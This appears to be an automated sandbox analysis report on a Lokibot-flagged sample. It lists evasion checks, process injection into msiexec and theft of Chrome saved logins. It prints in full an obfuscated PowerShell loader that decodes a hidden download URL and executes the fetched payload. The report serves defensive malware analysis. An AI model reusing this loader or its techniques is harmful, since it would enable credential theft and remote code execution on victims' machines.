                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5006Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4833Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5528Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4271Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 1440Thread sleep count: 4562 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5000Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 4562 delay: -5Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 60000Jump to behavior
                Source: powershell.exe, 00000001.00000002.1887143994.000001CA5EE48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlles
                Source: msiexec.exe, 00000008.00000002.3013665698.0000000008846000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_033CD338 LdrInitializeThunk,LdrInitializeThunk,3_2_033CD338

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_6648.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4348, type: MEMORYSTR
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2C80000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2C7FEA8Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(BurnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#frijsenborg amateurism knallertfreren unplaiting #>;$uniformsfrakke='tingene';<#gaffelens slgtsarv kommunevalgene catalufas kalkeringens skibsreders pyrolysevrk #>;$soundly=$host.privatedata;if ($soundly) {$realters++;}function burnets254($sewings){$noncataclysmic=$bronzedren+$sewings.length-$realters;for( $hulede=5;$hulede -lt $noncataclysmic;$hulede+=6){$extratropical+=$sewings[$hulede];}$extratropical;}function iba($charbroiled){ . ($beslaglgning) ($charbroiled);}$aarendes=burnets254 'selvpmkapniobeg az opsaithymylt.anslg anua prim/klyng5 penu.musta0perin sch,o(embadwgldssihaulanans.ndstavnoma wawtaaresoverf baptnubiqut rem borg 1uncon0choko. dlis0viktu;nonvo ,spswnussei aboondob e6 vine4un.ro;.erag skamfxdrill6reuss4natur;t.ght hathr dousvcroqu:bouc 1snapd2byg.e1lremi.krens0truck)unort karmigott,kedezinco ergkstuttoenera/ fast2 tryk0slutv1n hed0f,dig0en er1z osp0mu.kl1ir tt guiluffodgniraulirafooteoversft lukosengexsprin/ pref1 ille2r.fer1 shar.disap0 inqu ';$roskilde190=burnets254 'confeuinterschunke secoraab n-mist akalvegdahabecohobnunsettfremt ';$hyetograph=burnets254 'afkrihadfrdtbugmutsnivepfri as,onst:subve/jagtl/ munddusk,er r iniam invborsye onn.slidsgtoupeo hyp oensilgchoralfr dlerecha.proloc bryso fiskmabild/ footuinorgcrosel?no,paevocabx s ifpglo tohazierdiurnt ider=ph lodpjathobasiswretennslavilc,nopoundgaabalerdi gro& orfistv,odsnitm= lich1skirpnbaadeqredecj sagnxunan m hid.k coununidsty sade0k,onjhnonsyqanathzlegitkeurop_camoui,uttrg sepacberkeo efira e nsjafkorbstinedantisrskrivbarchlsestrazkjersjforrea skrivskrm x kl eabunkrb find ';$kiasmers=burnets254 'za fr>styrt ';$beslaglgning=burnets254 'boersi rdelepraesxov rv ';$skibssidernes='snarligt';$rettelsesblad='\assimileringens.lan';iba (burnets254 ' earj$antihg konnlskoleog umpb lycta owenl fnbl:mordaclogiey .omblmylodisugiln fraudloadaelakserpedesesort r bill=nonsp$ aktienephrn ekskvua hn:prluda fs,epd,onqp,nobbdp.lsya yclotsammeadipso+ arch$databr vinteelatet l,vetglanse.yperlunsucsfortreoveresmaelsbdesealcatalaherhjdnonin ');iba (burnets254 ' lapp$spinkgtvi llmediaohe.heb.elesahema lbeful:app esin.alc nurrrbrn pasketcwbetjelpremysak de=mglin$ fradh u fryr,curefla rtbursio llesgarve,rpseudau.ennpsuverhbundv.kukkesp.melpskulel knusispanktanari( obbl$fagblk udebi,ingia f easbrovtmymeree l ver angrsfrimu) m,cu ');iba (burnets254 't erm[ d,agnspr,ne probtsil c. nyprs aq.aespi sr unonvcor cira lecsubured.belpn.ntao alsmityranntechntarranmbiltyaovermndobbeadialogank eetricor pinc] nonc: .orr:a.kansabonnetvangcpjas.uphtharmo tgi rrsmtnetvryun.ncppicadrbarbaoinarctunverobrodechovedouagtsl per, de sk=moder bokma[uds anrunkeeunlyrtre ak.korr.satione ubinc sexiuslappr imbeiu diatarbejyhay.yptilslrurt ko tildt estaoundutcaneu oeledol per,taut,syl.ttep vipsesyned]sjusk:lodd.:.nsist ymbilikrafscy,li1trkni2 dato ');$hyetograph=$scrawls[0];$brnevold=(burn
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#frijsenborg amateurism knallertfreren unplaiting #>;$uniformsfrakke='tingene';<#gaffelens slgtsarv kommunevalgene catalufas kalkeringens skibsreders pyrolysevrk #>;$soundly=$host.privatedata;if ($soundly) {$realters++;}function burnets254($sewings){$noncataclysmic=$bronzedren+$sewings.length-$realters;for( $hulede=5;$hulede -lt $noncataclysmic;$hulede+=6){$extratropical+=$sewings[$hulede];}$extratropical;}function iba($charbroiled){ . ($beslaglgning) ($charbroiled);}$aarendes=burnets254 'selvpmkapniobeg az opsaithymylt.anslg anua prim/klyng5 penu.musta0perin sch,o(embadwgldssihaulanans.ndstavnoma wawtaaresoverf baptnubiqut rem borg 1uncon0choko. dlis0viktu;nonvo ,spswnussei aboondob e6 vine4un.ro;.erag skamfxdrill6reuss4natur;t.ght hathr dousvcroqu:bouc 1snapd2byg.e1lremi.krens0truck)unort karmigott,kedezinco ergkstuttoenera/ fast2 tryk0slutv1n hed0f,dig0en er1z osp0mu.kl1ir tt guiluffodgniraulirafooteoversft lukosengexsprin/ pref1 ille2r.fer1 shar.disap0 inqu ';$roskilde190=burnets254 'confeuinterschunke secoraab n-mist akalvegdahabecohobnunsettfremt ';$hyetograph=burnets254 'afkrihadfrdtbugmutsnivepfri as,onst:subve/jagtl/ munddusk,er r iniam invborsye onn.slidsgtoupeo hyp oensilgchoralfr dlerecha.proloc bryso fiskmabild/ footuinorgcrosel?no,paevocabx s ifpglo tohazierdiurnt ider=ph lodpjathobasiswretennslavilc,nopoundgaabalerdi gro& orfistv,odsnitm= lich1skirpnbaadeqredecj sagnxunan m hid.k coununidsty sade0k,onjhnonsyqanathzlegitkeurop_camoui,uttrg sepacberkeo efira e nsjafkorbstinedantisrskrivbarchlsestrazkjersjforrea skrivskrm x kl eabunkrb find ';$kiasmers=burnets254 'za fr>styrt ';$beslaglgning=burnets254 'boersi rdelepraesxov rv ';$skibssidernes='snarligt';$rettelsesblad='\assimileringens.lan';iba (burnets254 ' earj$antihg konnlskoleog umpb lycta owenl fnbl:mordaclogiey .omblmylodisugiln fraudloadaelakserpedesesort r bill=nonsp$ aktienephrn ekskvua hn:prluda fs,epd,onqp,nobbdp.lsya yclotsammeadipso+ arch$databr vinteelatet l,vetglanse.yperlunsucsfortreoveresmaelsbdesealcatalaherhjdnonin ');iba (burnets254 ' lapp$spinkgtvi llmediaohe.heb.elesahema lbeful:app esin.alc nurrrbrn pasketcwbetjelpremysak de=mglin$ fradh u fryr,curefla rtbursio llesgarve,rpseudau.ennpsuverhbundv.kukkesp.melpskulel knusispanktanari( obbl$fagblk udebi,ingia f easbrovtmymeree l ver angrsfrimu) m,cu ');iba (burnets254 't erm[ d,agnspr,ne probtsil c. nyprs aq.aespi sr unonvcor cira lecsubured.belpn.ntao alsmityranntechntarranmbiltyaovermndobbeadialogank eetricor pinc] nonc: .orr:a.kansabonnetvangcpjas.uphtharmo tgi rrsmtnetvryun.ncppicadrbarbaoinarctunverobrodechovedouagtsl per, de sk=moder bokma[uds anrunkeeunlyrtre ak.korr.satione ubinc sexiuslappr imbeiu diatarbejyhay.yptilslrurt ko tildt estaoundutcaneu oeledol per,taut,syl.ttep vipsesyned]sjusk:lodd.:.nsist ymbilikrafscy,li1trkni2 dato ');$hyetograph=$scrawls[0];$brnevold=(burn
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#frijsenborg amateurism knallertfreren unplaiting #>;$uniformsfrakke='tingene';<#gaffelens slgtsarv kommunevalgene catalufas kalkeringens skibsreders pyrolysevrk #>;$soundly=$host.privatedata;if ($soundly) {$realters++;}function burnets254($sewings){$noncataclysmic=$bronzedren+$sewings.length-$realters;for( $hulede=5;$hulede -lt $noncataclysmic;$hulede+=6){$extratropical+=$sewings[$hulede];}$extratropical;}function iba($charbroiled){ . ($beslaglgning) ($charbroiled);}$aarendes=burnets254 'selvpmkapniobeg az opsaithymylt.anslg anua prim/klyng5 penu.musta0perin sch,o(embadwgldssihaulanans.ndstavnoma wawtaaresoverf baptnubiqut rem borg 1uncon0choko. dlis0viktu;nonvo ,spswnussei aboondob e6 vine4un.ro;.erag skamfxdrill6reuss4natur;t.ght hathr dousvcroqu:bouc 1snapd2byg.e1lremi.krens0truck)unort karmigott,kedezinco ergkstuttoenera/ fast2 tryk0slutv1n hed0f,dig0en er1z osp0mu.kl1ir tt guiluffodgniraulirafooteoversft lukosengexsprin/ pref1 ille2r.fer1 shar.disap0 inqu ';$roskilde190=burnets254 'confeuinterschunke secoraab n-mist akalvegdahabecohobnunsettfremt ';$hyetograph=burnets254 'afkrihadfrdtbugmutsnivepfri as,onst:subve/jagtl/ munddusk,er r iniam invborsye onn.slidsgtoupeo hyp oensilgchoralfr dlerecha.proloc bryso fiskmabild/ footuinorgcrosel?no,paevocabx s ifpglo tohazierdiurnt ider=ph lodpjathobasiswretennslavilc,nopoundgaabalerdi gro& orfistv,odsnitm= lich1skirpnbaadeqredecj sagnxunan m hid.k coununidsty sade0k,onjhnonsyqanathzlegitkeurop_camoui,uttrg sepacberkeo efira e nsjafkorbstinedantisrskrivbarchlsestrazkjersjforrea skrivskrm x kl eabunkrb find ';$kiasmers=burnets254 'za fr>styrt ';$beslaglgning=burnets254 'boersi rdelepraesxov rv ';$skibssidernes='snarligt';$rettelsesblad='\assimileringens.lan';iba (burnets254 ' earj$antihg konnlskoleog umpb lycta owenl fnbl:mordaclogiey .omblmylodisugiln fraudloadaelakserpedesesort r bill=nonsp$ aktienephrn ekskvua hn:prluda fs,epd,onqp,nobbdp.lsya yclotsammeadipso+ arch$databr vinteelatet l,vetglanse.yperlunsucsfortreoveresmaelsbdesealcatalaherhjdnonin ');iba (burnets254 ' lapp$spinkgtvi llmediaohe.heb.elesahema lbeful:app esin.alc nurrrbrn pasketcwbetjelpremysak de=mglin$ fradh u fryr,curefla rtbursio llesgarve,rpseudau.ennpsuverhbundv.kukkesp.melpskulel knusispanktanari( obbl$fagblk udebi,ingia f easbrovtmymeree l ver angrsfrimu) m,cu ');iba (burnets254 't erm[ d,agnspr,ne probtsil c. nyprs aq.aespi sr unonvcor cira lecsubured.belpn.ntao alsmityranntechntarranmbiltyaovermndobbeadialogank eetricor pinc] nonc: .orr:a.kansabonnetvangcpjas.uphtharmo tgi rrsmtnetvryun.ncppicadrbarbaoinarctunverobrodechovedouagtsl per, de sk=moder bokma[uds anrunkeeunlyrtre ak.korr.satione ubinc sexiuslappr imbeiu diatarbejyhay.yptilslrurt ko tildt estaoundutcaneu oeledol per,taut,syl.ttep vipsesyned]sjusk:lodd.:.nsist ymbilikrafscy,li1trkni2 dato ');$hyetograph=$scrawls[0];$brnevold=(burnJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Lokibot
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

                Remote Access Functionality

                barindex
                Yara detected Lokibot
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		221
                Scripting                		111
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		11
